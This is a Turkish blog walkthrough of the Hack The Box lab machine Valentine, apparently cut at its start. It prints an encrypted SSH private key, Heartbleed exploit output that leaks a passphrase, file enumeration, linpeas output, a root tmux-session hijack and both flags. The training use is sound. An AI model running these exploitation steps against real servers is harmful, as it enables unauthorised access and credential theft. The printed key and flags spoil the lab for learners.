Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----ENDRSAPRIVATEKEY-----

┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# cat ssh-key      
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----

┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# ssh 10.10.10.79 -i ssh-key
Enter passphrase for key 'ssh-key': 

┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# /usr/share/john/ssh2john.py ssh-key
ssh-key:$sshng$1$16$AEB88C140F69BF2074788DE24AE48D46$1200$0db3eb3bbf247a036e9350c0aa500de636e35efd0f3eca20de375b3054bc884f69dd438bd25174c5fecfce6ae40daf11e72fdbe3afbd9c4a4231f4cf84db8945c5b653680970e147fbd4490c10b95093144b5fe08c1ffbfcccb4d0cc31f9a23ad0423449b3985005755b8115ee6f7a42c663af026f9e355a7e6e95b0a6933c11e9ba07004af32acfbe96e9a6d165e5e211bc3aea18c5980bb8033a9c33f92280d4453d8b8d897ad7b35c3f75e2c2a8227e11ad53f3395ab3a7dc9a133c03ef0f39704a35eea5d7b84a693eb0167a7979739a5081ef1e7bcee9270755646b67bd1f7297298a62f5c35dd381d77602219da472c9a585082393ee3bac7e2d2f27d6bfc658ca923848a63510f58ffe7dff8bb744ead308a7a8f43b1346ab3693548741d5b01706976d8c93d6ec403129791eaf4e0f91c9f06d11e8923946f08d5108f0c741484e38cc8e72c8a718ef7eaf84a74803d1473294a9baac266a69cc2749d7475bc5b72f12660b17715b996de5d3e30240584549e5f751120a20f867eb823a5ea32c50f691a38b7eec9e7b47d809bec64ea39eec498c0777c623049d5bc382f0d593930a6373410b6e551aeae94eb7d82b4a8b114c2b19775e0e3edb386cbb292b130c3ac8272a5a17be794f392c12a56cbd5a9eb2f175fcf85e34af19795ea8435018729350b760f3a20ee3ce9cc5da2297b57606f435d0f533d65048d50bc350c70863cfe09492c57ec159d0ca6809d626f160940e2814105503cb803cc7d5d971509e3c144f96cf2c2eb9b45b2da11b53675b92aee6a2dbb9314e72d0fb043cee531a75db3519035e1ac2927fc47faec44a79e29c8a50de3c28de68baadab19e136816d834331b7aaf681bd44025a10ea38394db8f927baae61764fca50658cda7d195a629cf7372a91edb6f81ba6d7e258412c6589f9c993e152bf50af4f2990ec40ad7136763ede5fe6eaeb9eb7e4e27a4ea1db0254d0d51b3d3ee96b4bb2b848b5fb9d8f3dfd1679a1241ed95591c9367515f9e0252b2ff7e31fbf3df8d656f33885a693b59f11c59c1dcd7a9fd57421b48d00b9e34e1bc470f9327b506c7d26ec7fd160b946648070279df44a906546d4e572bb073f2d58e66e16732b02e169944d77c1c433ce9f3688cfd3d9d58d3698b565179344a2d56d36c1bbb53732fed5383d2293722121421588d2aa2c86f9653b2302b7614e64a7708275849ccfadd0da941a7f17d26eebf808c9cda5d8ab54a128e674517cafe268bdd7d51dc3c55f1e49814a14bea9aa9b97718e58649180a7e271b27210f42172c48b7dd9fad7ce7b2386561af2cbdb54d35f93ff5fc97ea8a76e2b2f60f2112a58a67b2e90108506464758d37278dedbe46853542a1d1e1cc75457a14ee06ba7e56e3ea6aa0ef30255ed436426f832302332c95ffbdc4af935c42f789c98838145d3f2c3a7bf2654255519664a116923c79bffc56c4f22527be6fce77cee576a8bb2e2da04cc582a6dfecc40c80ef78a3cd69a59980472ac729420bfc14c945e5309e74370e8935530cf0b7828a2dce116974967f4bd5bfcd5e91e319af161c74e3a088a5079a8d532cb049e4c11766b04655c7f41ae4646e0573881d996fc8cd345481991b31064d2087f38f542e8a5455066fc5efa63f60cae69ccf64ff5c52188b24c02510fbde42187244f0c9210f7

┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# /usr/share/john/ssh2john.py ssh-key > hash

Daha sonrasında passphrase'ı kırmayı denedim ancak başarılı olamadım ve heartbleed'e odkalandım. Proje sayfası: https://github.com/kudayDOTsite/heartbleed-poc


┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# python2 heartbleed.py 10.10.10.79 -v

defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)

##################################################################
Connecting to: 10.10.10.79:443, 1 times
Sending Client Hello for TLSv1.0
Waiting for Server Hello...
Received message: type = 22, version = 0x301, length = 66
Received message: type = 22, version = 0x301, length = 885
Received message: type = 22, version = 0x301, length = 331
Received message: type = 22, version = 0x301, length = 4
Received Server Hello for TLSv1.0

Sending heartbeat request...
Received message: type = 24, version = 0x301, length = 16384
Received heartbeat response...

WARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 1
##################################################################

[email protected][...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==;-.../..)....7{..~.n

Denemelerim sonucunda aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== veriisini yakaladım ve bunu dönüştürüdm.


┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' | base64 -d      
heartbleedbelievethehype

ssh ile bağlandım ve ilk flagimi aldım.


┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# ssh [email protected] -i ssh-key                   
Enter passphrase for key 'ssh-key': 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$ whoami
hype
hype@Valentine:~$ find /home -readable -type f -exec ls -al {} \; 2>/dev/null
-rw-r--r-- 1 hype hype 675 Dec 11  2017 /home/hype/.profile
-rw------- 1 hype hype 207 Dec 11  2017 /home/hype/.gnome2/keyrings/user.keystore
-rw------- 1 hype hype 105 Dec 11  2017 /home/hype/.gnome2/keyrings/login.keyring
-rw-rw-r-- 1 hype hype 104 Dec 11  2017 /home/hype/.fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le64.cache-3
-rw-rw-r-- 1 hype hype 8832 Dec 11  2017 /home/hype/.fontconfig/e13b20fdb08344e0e664864cc2ede53d-le64.cache-3
-rw-rw-r-- 1 hype hype 12872 Dec 11  2017 /home/hype/.fontconfig/7ef2298fde41cc6eeb7af42e48b7d293-le64.cache-3
-rw------- 1 hype hype 131 Feb 16  2018 /home/hype/.bash_history
-rw-r--r-- 1 hype hype 220 Dec 11  2017 /home/hype/.bash_logout
-rw-rw-r-- 1 hype hype 371 Dec 11  2017 /home/hype/.cache/unity-lens-video/videos.db
-rw-rw-r-- 1 hype hype 3683 Dec 11  2017 /home/hype/.cache/update-manager-core/meta-release-lts
-rw-rw-r-- 1 hype hype 541612 Dec 11  2017 /home/hype/.cache/wallpaper/0_5_1700_927_792beab7550410d531e55f95b449f135
-rw-r--r-- 1 hype hype 3072 Dec 11  2017 /home/hype/.cache/indicator-appmenu/hud-usage-log.sqlite
-rw-rw-r-- 1 hype hype 1978 Dec 11  2017 /home/hype/.cache/unity/migration_script.log
-rw------- 1 hype hype 1 Dec 11  2017 /home/hype/.cache/dconf/user
-rw-r--r-- 1 hype hype 0 Dec 11  2017 /home/hype/.cache/motd.legal-displayed
-rw-rw-r-- 1 hype hype 71 Dec 11  2017 /home/hype/.cache/indicators/messages/seen-db.keyfile
-rw-r--r-- 1 hype hype 16384 Dec 11  2017 /home/hype/.cache/event-sound-cache.tdb.c9052f1b76300a5447f46cc700000004.x86_64-pc-linux-gnu
-rw-r--r-- 1 hype hype 26 Dec 11  2017 /home/hype/.dmrc
-rw------- 1 hype hype 0 Dec 11  2017 /home/hype/.Xauthority
-rw-rw-r-- 1 hype hype 5 Dec 11  2017 /home/hype/.config/user-dirs.locale
-rw------- 1 hype hype 632 Dec 11  2017 /home/hype/.config/user-dirs.dirs
-rw-rw-r-- 1 hype hype 1152 Dec 11  2017 /home/hype/.config/dconf/user
-rw-rw-r-- 1 hype hype 97 Dec 11  2017 /home/hype/.config/nautilus/desktop-metadata
-rw-rw-r-- 1 hype hype 3031 Dec 11  2017 /home/hype/.config/Trolltech.conf
-rw------- 1 hype hype 1024 Dec 11  2017 /home/hype/.local/share/zeitgeist/activity.sqlite
-rw------- 1 hype hype 281944 Dec 11  2017 /home/hype/.local/share/zeitgeist/activity.sqlite-wal
-rw------- 1 hype hype 32768 Dec 11  2017 /home/hype/.local/share/zeitgeist/activity.sqlite-shm
-rw-rw-r-- 1 hype hype 14 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseA
-rw-rw-r-- 1 hype hype 14 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.baseB
-rw-rw-r-- 1 hype hype 16384 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/record.DB
-rw-rw-r-- 1 hype hype 28 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/iamchert
-rw-rw-r-- 1 hype hype 16384 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/position.DB
-rw-rw-r-- 1 hype hype 16384 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.DB
-rw-rw-r-- 1 hype hype 0 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/flintlock
-rw-rw-r-- 1 hype hype 14 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseB
-rw-rw-r-- 1 hype hype 14 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.baseA
-rw-rw-r-- 1 hype hype 14 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseA
-rw-rw-r-- 1 hype hype 16384 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.DB
-rw-rw-r-- 1 hype hype 14 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseB
-rw-rw-r-- 1 hype hype 14 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseA
-rw-rw-r-- 1 hype hype 14 Dec 11  2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseB
-rw-r--r-- 1 hype hype 19456 Dec 11  2017 /home/hype/.local/share/webkit/icondatabase/WebpageIcons.db
-rw-rw-r-- 1 hype hype 0 Dec 11  2017 /home/hype/.local/share/.converted-launchers
-rw------- 1 hype hype 38 Dec 11  2017 /home/hype/.local/share/telepathy/mission-control/accounts-goa.cfg
-rw-rw-r-- 1 hype hype 835 Dec 11  2017 /home/hype/.local/share/gsettings-data-convert
-rw------- 1 hype hype 1766 Dec 13  2017 /home/hype/.ssh/id_rsa
-rw------- 1 hype hype 222 Dec 13  2017 /home/hype/.ssh/known_hosts
-rw-r--r-- 1 hype hype 397 Dec 13  2017 /home/hype/.ssh/id_rsa.pub
-rw------- 1 hype hype 397 Dec 13  2017 /home/hype/.ssh/authorized_keys
-rw------- 1 hype hype 115 Dec 11  2017 /home/hype/.gconf/apps/update-notifier/%gconf.xml
-rw------- 1 hype hype 0 Dec 11  2017 /home/hype/.gconf/apps/%gconf.xml
-rw------- 1 hype hype 384 Dec 11  2017 /home/hype/.gconf/apps/update-manager/%gconf.xml
-rw------- 1 hype hype 102 Dec 11  2017 /home/hype/.gconf/apps/nm-applet/%gconf.xml
-rw------- 1 hype hype 0 Dec 11  2017 /home/hype/.gconf/apps/gnome-terminal/%gconf.xml
-rw------- 1 hype hype 904 Dec 11  2017 /home/hype/.gconf/apps/gnome-terminal/profiles/Default/%gconf.xml
-rw------- 1 hype hype 0 Dec 11  2017 /home/hype/.gconf/apps/gnome-terminal/profiles/%gconf.xml
-rw-r--r-- 1 root root 39 Dec 13  2017 /home/hype/.tmux.conf
-rw------- 1 hype hype 21 Dec 11  2017 /home/hype/.mission-control/accounts/accounts.cfg
-rw------- 1 hype hype 12173 Dec 11  2017 /home/hype/.xsession-errors
-rw------- 1 hype hype 636 Dec 11  2017 /home/hype/.ICEauthority
-rw-r--r-- 1 hype hype 696 Dec 11  2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-card-database.tdb
-rw-r--r-- 1 hype hype 12288 Dec 11  2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-device-volumes.tdb
-rw-r--r-- 1 hype hype 10 Dec 11  2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-sink
-rw-r--r-- 1 hype hype 18 Dec 11  2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-source
-rw-r--r-- 1 hype hype 696 Dec 11  2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-stream-volumes.tdb
-rw-rw-r-- 1 hype hype 132 Dec 11  2017 /home/hype/.gtk-bookmarks
-rw-rw-r-- 1 hype hype 33 Dec 13  2017 /home/hype/Desktop/user.txt
-rw------- 1 hype hype 256 Dec 11  2017 /home/hype/.pulse-cookie
-rw-rw-r-- 1 hype hype 463 Dec 11  2017 /home/hype/.dbus/session-bus/c9052f1b76300a5447f46cc700000004-0
-rw-r--r-- 1 hype hype 3486 Dec 11  2017 /home/hype/.bashrc
-rw------- 1 hype hype 9659 Dec 11  2017 /home/hype/.xsession-errors.old
hype@Valentine:~$ 
hype@Valentine:~$ cat /home/hype/Desktop/user.txt
e6710a5464769fd5fcd216e076961750

Daha sonrasında içeridei enum yapmak için çeşitli scriptler kullandım. /linpeas.sh işimi çözdü. Linpeas çıktısında dikkat çekici nokta aşağıda:

╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
root          1  0.0  0.2  24432  2420 ?        Ss   Aug11   0:00 /sbin/init
root        302  0.0  0.0  17224   636 ?        S    Aug11   0:00 upstart-udev-bridge --daemon[0m
root        307  0.0  0.1  22008  1784 ?        Ss   Aug11   0:00 /sbin/udevd --daemon[0m
root        540  0.0  0.1  22004  1264 ?        S    Aug11   0:00  _ /sbin/udevd --daemon[0m
root       1085  0.0  0.1  22004  1268 ?        S    Aug11   0:00  _ /sbin/udevd --daemon[0m
syslog      553  0.0  0.1 249464  1500 ?        Sl   Aug11   0:01 rsyslogd -c5
102         566  0.0  0.1  24072  1248 ?        Ss   Aug11   0:00 dbus-daemon[0m --system --fork --activation=upstart
root        588  0.0  0.3  79036  3208 ?        Ss   Aug11   0:00 /usr/sbin/modem-manager
root        608  0.0  0.1  21180  1720 ?        Ss   Aug11   0:00 /usr/sbin/bluetoothd
avahi       622  0.0  0.0  32172   468 ?        S    Aug11   0:00  _ avahi-daemon[0m: chroot helper
root        630  0.0  0.6 174448  6624 ?        Ssl  Aug11   0:00 NetworkManager
root        641  0.0  0.3 104088  3948 ?        Ss   Aug11   0:00 /usr/sbin/cupsd -F
root        748  0.0  0.0  15180   396 ?        S    Aug11   0:00 upstart-socket-bridge --daemon[0m
root        817  0.0  0.3 203500  3896 ?        Sl   Aug11   0:00 /usr/lib/policykit-1/polkitd --no-debug
root        922  0.0  0.2  49952  2848 ?        Ss   Aug11   0:00 /usr/sbin/sshd -D
hype       4887  0.0  0.1  92372  1668 ?        S    02:07   0:00      _ sshd: hype@pts/0    
hype       4888  0.2  0.8  31604  8684 pts/0    Ss   02:07   0:00          _ -bash
hype       5104  0.1  0.1   5096  1456 pts/0    S+   02:09   0:00              _ /bin/sh ./linpeas.sh -a
hype       6141  0.0  0.1   5096  1028 pts/0    S+   02:09   0:00                  _ /bin/sh ./linpeas.sh -a
hype       6145  0.0  0.1  22464  1228 pts/0    R+   02:09   0:00                  |   _ ps fauxwww
hype       6144  0.0  0.0   5096   856 pts/0    S+   02:09   0:00                  _ /bin/sh ./linpeas.sh -a
root       1011  0.0  0.0  19976   968 tty4     Ss+  Aug11   0:00 /sbin/getty -8 38400 tty4
root       1020  0.0  0.0  19976   976 tty5     Ss+  Aug11   0:00 /sbin/getty -8 38400 tty5
root       1026  0.0  0.0  19976   972 tty2     Ss+  Aug11   0:00 /sbin/getty -8 38400 tty2
root       1027  0.0  0.0  19976   976 tty3     Ss+  Aug11   0:00 /sbin/getty -8 38400 tty3
root       1029  0.0  0.1  26416  1676 ?        Ss   Aug11   0:13 /usr/bin/tmux -S /.devs/dev_sess
root       1033  0.0  0.4  20652  4588 pts/18   Ss+  Aug11   0:00  _ -bash
root       1038  0.0  0.0  19976   972 tty6     Ss+  Aug11   0:00 /sbin/getty -8 38400 tty6
root       1058  0.0  0.0   4452   812 ?        Ss   Aug11   0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root       1059  0.0  0.1  19104  1036 ?        Ss   Aug11   0:00 cron
daemon[0m     1060  0.0  0.0  16900   384 ?        Ss   Aug11   0:00 atd
whoopsie   1066  0.0  0.5 203064  5548 ?        Ssl  Aug11   0:00 whoopsie
root       1114  0.0  0.4 162284  4320 ?        Sl   Aug11   0:29 /usr/bin/vmtoolsd
root       1286  0.0  1.0 113124 10904 ?        Ss   Aug11   0:01 /usr/sbin/apache2 -k start
www-data   2582  0.0  0.8 113864  8488 ?        S    Aug11   0:00  _ /usr/sbin/apache2 -k start
www-data   2583  0.0  0.8 113864  8488 ?        S    Aug11   0:00  _ /usr/sbin/apache2 -k start
www-data   2584  0.0  0.8 113864  8484 ?        S    Aug11   0:00  _ /usr/sbin/apache2 -k start
www-data   2585  0.0  0.8 113868  8480 ?        S    Aug11   0:00  _ /usr/sbin/apache2 -k start
www-data   2586  0.0  0.8 113864  8492 ?        S    Aug11   0:00  _ /usr/sbin/apache2 -k start
www-data   3825  0.0  0.8 113864  8460 ?        S    Aug11   0:00  _ /usr/sbin/apache2 -k start
root       1457  0.0  0.0  19976   976 tty1     Ss+  Aug11   0:00 /sbin/getty -8 38400 tty1
root       1614  0.0  1.0  66916 10296 ?        S    Aug11   0:00 /usr/lib/vmware-vgauth/VGAuthService -s
root       1649  0.0  0.5 510124  5464 ?        Sl   Aug11   0:14 //usr/lib/vmware-caf/pme/bin/ManagementAgentHost
root       1677  0.0  0.3 584296  3892 ?        Sl   Aug11   0:00 /usr/sbin/console-kit-daemon[0m --no-daemon

Görüldüğü üzere tmux'da aktik bir session var. Ayrıca root haklarında...

hype@Valentine:/tmp$ tmux -S /.devs/dev_sess

root@Valentine:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/tmp# cd /root/
root@Valentine:~# ls
curl.sh  root.txt
root@Valentine:~# cat root.txt 
f1bb6d759df1f272914ebbc9ed7765b2
root@Valentine:~# 
Kategori:SSLWalkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir